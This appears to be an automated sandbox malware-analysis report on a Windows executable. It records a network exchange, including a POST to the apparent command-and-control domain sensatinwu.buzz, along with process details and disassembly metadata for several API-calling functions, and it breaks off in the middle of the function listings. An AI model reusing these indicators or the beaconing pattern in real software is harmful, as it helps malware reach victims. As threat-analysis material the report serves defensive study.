                                                    2024-10-06 09:35:10 UTC3768INData Raw: 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f
                                                    Data Ascii: lass="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitPro
                                                    2024-10-06 09:35:10 UTC161INData Raw: 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: w mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449731188.114.96.34431352C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-06 09:35:11 UTC262OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: sensatinwu.buzz
                                                    2024-10-06 09:35:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-10-06 09:35:12 UTC764INHTTP/1.1 200 OK
                                                    Date: Sun, 06 Oct 2024 09:35:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=7jmrb3ql7qgrbnmhsran4dqme2; expires=Thu, 30 Jan 2025 03:21:51 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PG7KVWWA4wP5hqLo6VoUlmray3Uv1nWVk1CgYhRNXVzQRNhgFvZW7PsV6QgOHamgZwcGtwYTpgzZ6KQx5EoaNhzu1T7mjVxX%2BcMTIdQTBfJlaRGKvQ3myqHRBGwfDZkybQg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8ce4a8f68ca343d7-EWR
                                                    2024-10-06 09:35:12 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                    Data Ascii: aerror #D12
                                                    2024-10-06 09:35:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:05:35:04
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0x1a0000
                                                    File size:1'823'232 bytes
                                                    MD5 hash:AC789B4838922466F1437F6E440DC4A3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:1.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:55.4%
                                                      Total number of Nodes:56
                                                      Total number of Limit Nodes:6
                                                      execution_graph 21087 1b049b 21089 1b0227 21087->21089 21088 1b0455 21094 1e5700 RtlFreeHeap 21088->21094 21089->21088 21090 1b0308 21089->21090 21093 1e5700 RtlFreeHeap 21089->21093 21093->21088 21094->21090 21095 1e673d 21097 1e66aa 21095->21097 21096 1e6793 21097->21096 21100 1e5bb0 LdrInitializeThunk 21097->21100 21099 1e67b3 21100->21099 21101 1e50fa 21102 1e514c 21101->21102 21103 1e5176 LoadLibraryExW 21101->21103 21102->21103 21104 1e518c 21103->21104 21105 1e695b 21106 1e6965 21105->21106 21106->21106 21107 1e6a5e 21106->21107 21109 1e5bb0 LdrInitializeThunk 21106->21109 21109->21107 21110 1e64b8 21112 1e63f2 21110->21112 21111 1e646e 21112->21111 21114 1e5bb0 LdrInitializeThunk 21112->21114 21114->21111 21115 1ad110 21117 1ad119 21115->21117 21116 1ad2ee ExitProcess 21117->21116 21118 1ad2e9 21117->21118 21121 1b0b40 FreeLibrary 21117->21121 21122 1e56e0 FreeLibrary 21118->21122 21121->21118 21122->21116 21123 1e60d2 21125 1e60fa 21123->21125 21124 1e614e 21128 1e5bb0 LdrInitializeThunk 21124->21128 21125->21124 21129 1e5bb0 LdrInitializeThunk 21125->21129 21128->21124 21129->21124 21143 4533b6 21144 4533e3 VirtualAlloc 21143->21144 21146 4535dc VirtualFree 21144->21146 21148 453673 21146->21148 21149 1e626a 21151 1e628d 21149->21151 21150 1e636e 21153 1e62de 21151->21153 21156 1e5bb0 LdrInitializeThunk 21151->21156 21153->21150 21155 1e5bb0 LdrInitializeThunk 21153->21155 21155->21150 21156->21153 21157 1dd9cb 21158 1dd9fb 21157->21158 21159 1dda65 21158->21159 21161 1e5bb0 LdrInitializeThunk 21158->21161 21161->21158 21162 1afca0 21165 1afcdc 21162->21165 21163 1affe4 21165->21163 21166 1e3220 21165->21166 21167 1e32ac 21166->21167 21168 1e32a2 RtlFreeHeap 21166->21168 21169 1e3236 21166->21169 21167->21163 21168->21167 21169->21168 21170 1e3202 RtlAllocateHeap

                                                      Executed Functions

                                                      Function 001E50FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 25 1e50fa-1e514a 26 1e514c-1e514f 25->26 27 1e5176-1e5186 LoadLibraryExW 25->27 28 1e5150-1e5174 call 1e5a50 26->28 29 1e518c-1e51b5 27->29 30 1e52d8-1e5304 27->30 28->27 29->30
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 001E5182
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: <I$)$<I$)$@^
                                                      • API String ID: 1029625771-935358343
                                                      • Opcode ID: d2412c8324452fe6dc0c2cafd21ad588660c79c530b3d26a212b8ac0c4d95f38
                                                      • Instruction ID: 229b99c240bd4f424bc05e1fe5b119a0e793099d4c61d1f71eb0c59aac18c0ee
                                                      • Opcode Fuzzy Hash: d2412c8324452fe6dc0c2cafd21ad588660c79c530b3d26a212b8ac0c4d95f38
                                                      • Instruction Fuzzy Hash: D9219D351083848FC300DF68D890B2EB7E5AB6A304F69482CE1C5D7352D736D955CB56
                                                      Function 001AFCA0 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 60 1afca0-1afcda 61 1afd0b-1afe22 60->61 62 1afcdc-1afcdf 60->62 64 1afe5b-1afe8c 61->64 65 1afe24 61->65 63 1afce0-1afd09 call 1b2690 62->63 63->61 68 1afe8e-1afe8f 64->68 69 1afeb6-1afecf call 1b0b50 64->69 67 1afe30-1afe59 call 1b2760 65->67 67->64 72 1afe90-1afeb4 call 1b2700 68->72 77 1affe4-1affe6 69->77 78 1afed5-1afef8 69->78 72->69 82 1b01b1-1b01bb 77->82 80 1afefa 78->80 81 1aff2b-1aff2d 78->81 83 1aff00-1aff29 call 1b27e0 80->83 84 1aff30-1aff3a 81->84 83->81 86 1aff3c-1aff3f 84->86 87 1aff41-1aff49 84->87 86->84 86->87 89 1aff4f-1aff76 87->89 90 1b01a2-1b01a5 call 1e3220 87->90 92 1affab-1affb5 89->92 93 1aff78 89->93 96 1b01aa-1b01ad 90->96 94 1affeb 92->94 95 1affb7-1affbb 92->95 97 1aff80-1affa9 call 1b2840 93->97 99 1affed-1affef 94->99 98 1affc7-1affcb 95->98 96->82 97->92 101 1b019a 98->101 102 1affd1-1affd8 98->102 99->101 103 1afff5-1b002c 99->103 101->90 105 1affda-1affdc 102->105 106 1affde 102->106 107 1b005b-1b0065 103->107 108 1b002e-1b002f 103->108 105->106 111 1affc0-1affc5 106->111 112 1affe0-1affe2 106->112 109 1b0067-1b006f 107->109 110 1b00a4 107->110 113 1b0030-1b0059 call 1b28a0 108->113 114 1b0087-1b008b 109->114 115 1b00a6-1b00a8 110->115 111->98 111->99 112->111 113->107 114->101 117 1b0091-1b0098 114->117 115->101 118 1b00ae-1b00c5 115->118 120 1b009a-1b009c 117->120 121 1b009e 117->121 122 1b00fb-1b0102 118->122 123 1b00c7 118->123 120->121 124 1b0080-1b0085 121->124 125 1b00a0-1b00a2 121->125 127 1b0130-1b013c 122->127 128 1b0104-1b010d 122->128 126 1b00d0-1b00f9 call 1b2900 123->126 124->114 124->115 125->124 126->122 130 1b01c2-1b01c7 127->130 129 1b0117-1b011b 128->129 129->101 132 1b011d-1b0124 129->132 130->90 134 1b012a 132->134 135 1b0126-1b0128 132->135 136 1b012c-1b012e 134->136 137 1b0110-1b0115 134->137 135->134 136->137 137->129 138 1b0141-1b0143 137->138 138->101 139 1b0145-1b015b 138->139 139->130 140 1b015d-1b015f 139->140 141 1b0163-1b0166 140->141 142 1b0168-1b0188 call 1b2030 141->142 143 1b01bc 141->143 146 1b018a-1b0190 142->146 147 1b0192-1b0198 142->147 143->130 146->141 146->147 147->130
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: J|BJ$V$VY^_$t
                                                      • API String ID: 0-3701112211
                                                      • Opcode ID: 6a462e02fa9d68c3e68e4b195a342615253237bcb3405bbbf0dcaddec3603cf9
                                                      • Instruction ID: 254a18677d6670216766a575b5bef36a454dfabf3e1fc34559e37ad14b531fe9
                                                      • Opcode Fuzzy Hash: 6a462e02fa9d68c3e68e4b195a342615253237bcb3405bbbf0dcaddec3603cf9
                                                      • Instruction Fuzzy Hash: 71D1887550C3909BD316DF58C49466FBBE1AF9AB44F18882CF4C98B212C336CD4ADB92
                                                      Function 001AD110 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 184 1ad110-1ad11b call 1e4cc0 187 1ad2ee-1ad2f6 ExitProcess 184->187 188 1ad121-1ad130 call 1dc8d0 184->188 192 1ad2e9 call 1e56e0 188->192 193 1ad136-1ad15f 188->193 192->187 197 1ad161 193->197 198 1ad196-1ad1bf 193->198 201 1ad170-1ad194 call 1ad300 197->201 199 1ad1c1 198->199 200 1ad1f6-1ad20c 198->200 202 1ad1d0-1ad1f4 call 1ad370 199->202 203 1ad239-1ad23b 200->203 204 1ad20e-1ad20f 200->204 201->198 202->200 208 1ad23d-1ad25a 203->208 209 1ad286-1ad2aa 203->209 207 1ad210-1ad237 call 1ad3e0 204->207 207->203 208->209 215 1ad25c-1ad25f 208->215 211 1ad2ac-1ad2af 209->211 212 1ad2d6 call 1ae8f0 209->212 216 1ad2b0-1ad2d4 call 1ad490 211->216 221 1ad2db-1ad2dd 212->221 219 1ad260-1ad284 call 1ad440 215->219 216->212 219->209 221->192 224 1ad2df-1ad2e4 call 1b2f10 call 1b0b40 221->224 224->192
                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 001AD2F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: f42a70deaf3c8f62a8e5f58b69a81f7c16050ebeeb5a8a461b5ea48cf26afe95
                                                      • Instruction ID: d97b7dbf9e14999ee49651b56c276b7d9cd9896ea161df170b3095a3f679e236
                                                      • Opcode Fuzzy Hash: f42a70deaf3c8f62a8e5f58b69a81f7c16050ebeeb5a8a461b5ea48cf26afe95
                                                      • Instruction Fuzzy Hash: E44153B840D380ABD701AB68E594A2EFBF1AFA3704F048C0DE4C597612C73AD814DB67
                                                      Function 001E5BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 1e5bb0-1e5be2 LdrInitializeThunk
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(001E973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 001E5BDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                      Function 001E695B Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 1e695b-1e696b call 1e4a20 271 1e696d 268->271 272 1e6981-1e6a02 268->272 273 1e6970-1e697f 271->273 274 1e6a36-1e6a42 272->274 275 1e6a04 272->275 273->272 273->273 277 1e6a44-1e6a4f 274->277 278 1e6a85-1e6a9f 274->278 276 1e6a10-1e6a34 call 1e73e0 275->276 276->274 280 1e6a50-1e6a57 277->280 282 1e6a59-1e6a5c 280->282 283 1e6a60-1e6a66 280->283 282->280 284 1e6a5e 282->284 283->278 285 1e6a68-1e6a7d call 1e5bb0 283->285 284->278 287 1e6a82 285->287 287->278
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: d5d1f5c2a741d5779df3a4ed0d45cd9b0efd5a65b83ee16ddb7da7f618c1e10b
                                                      • Instruction ID: 9ebb242b62e1750c5b78d27ae486507e4172b029929cf8bd78603c592f90a6f0
                                                      • Opcode Fuzzy Hash: d5d1f5c2a741d5779df3a4ed0d45cd9b0efd5a65b83ee16ddb7da7f618c1e10b
                                                      • Instruction Fuzzy Hash: F3319AB09087418FD718EF15D49063EB7F2FFA4384F84892CE5C697261E3749944CB56
                                                      Function 001B049B Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 288 1b049b-1b0515 call 1ac9f0 292 1b045b-1b0469 call 1e5700 288->292 293 1b03fb-1b0414 288->293 294 1b0339-1b034f 288->294 295 1b035f-1b0367 288->295 296 1b03be 288->296 297 1b03de-1b03e3 288->297 298 1b051c-1b051e 288->298 299 1b0393-1b0397 288->299 300 1b0472-1b0477 288->300 301 1b0311-1b0332 288->301 302 1b0370-1b037e 288->302 303 1b03d0-1b03d7 288->303 304 1b0417-1b0430 288->304 305 1b0356 288->305 306 1b0308-1b030c 288->306 307 1b03ec-1b03f4 288->307 308 1b0242-1b0244 288->308 309 1b0482-1b0484 288->309 310 1b0440-1b0458 call 1e5700 288->310 311 1b0480 288->311 312 1b0227-1b023b 288->312 313 1b0246-1b0260 288->313 314 1b0386-1b038c 288->314 292->300 293->304 294->292 294->293 294->295 294->296 294->297 294->299 294->300 294->302 294->303 294->304 294->305 294->307 294->309 294->310 294->311 294->314 295->302 296->303 297->307 315 1b0520 298->315 326 1b03a0-1b03b7 299->326 300->311 301->292 301->293 301->294 301->295 301->296 301->297 301->299 301->300 301->302 301->303 301->304 301->305 301->307 301->309 301->310 301->311 301->314 302->314 303->293 303->297 303->299 303->300 303->304 303->307 303->309 303->311 303->314 304->310 305->295 316 1b048d-1b0496 306->316 307->293 307->299 307->300 307->309 307->311 318 1b0296-1b02bd 308->318 309->316 310->292 312->292 312->293 312->294 312->295 312->296 312->297 312->299 312->300 312->301 312->302 312->303 312->304 312->305 312->306 312->307 312->308 312->309 312->310 312->311 312->313 312->314 319 1b0262 313->319 320 1b0294 313->320 314->299 314->300 314->309 314->311 333 1b0529-1b0b30 315->333 316->315 328 1b02ea-1b0301 318->328 329 1b02bf 318->329 327 1b0270-1b0292 call 1b2eb0 319->327 320->318 326->292 326->293 326->296 326->297 326->299 326->300 326->303 326->304 326->307 326->309 326->310 326->311 326->314 327->320 328->292 328->293 328->294 328->295 328->296 328->297 328->299 328->300 328->301 328->302 328->303 328->304 328->305 328->306 328->307 328->309 328->310 328->311 328->314 335 1b02c0-1b02e8 call 1b2e70 329->335 335->328
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97c0a7122e800b90227e1139ad4ee1e1b669a28524397b6bc3d36d41779db1b8
                                                      • Instruction ID: ff538edc303f471aee927110ddc9023f4af9e904e80c15acb098d51b8f696ebd
                                                      • Opcode Fuzzy Hash: 97c0a7122e800b90227e1139ad4ee1e1b669a28524397b6bc3d36d41779db1b8
                                                      • Instruction Fuzzy Hash: 03918C75200B00CFD729CF65D894A2BB7F6FF89314B118A6CE8568BAA1D731F856CB50
                                                      Function 001B0228 Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2a8a55da3037203fa85c9f06225ef46c89d6fbea88fcc995e112c641bd23782
                                                      • Instruction ID: 2fa47c3004a008dd7884ab4caaf4262e1acc6bf5aceb08a92e72387b2402f113
                                                      • Opcode Fuzzy Hash: a2a8a55da3037203fa85c9f06225ef46c89d6fbea88fcc995e112c641bd23782
                                                      • Instruction Fuzzy Hash: 6D716C74200740DFD7258F61E894B2BB7B6FF89314F11896CE8568BA62C731E85ACB50
                                                      Function 001E99D0 Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
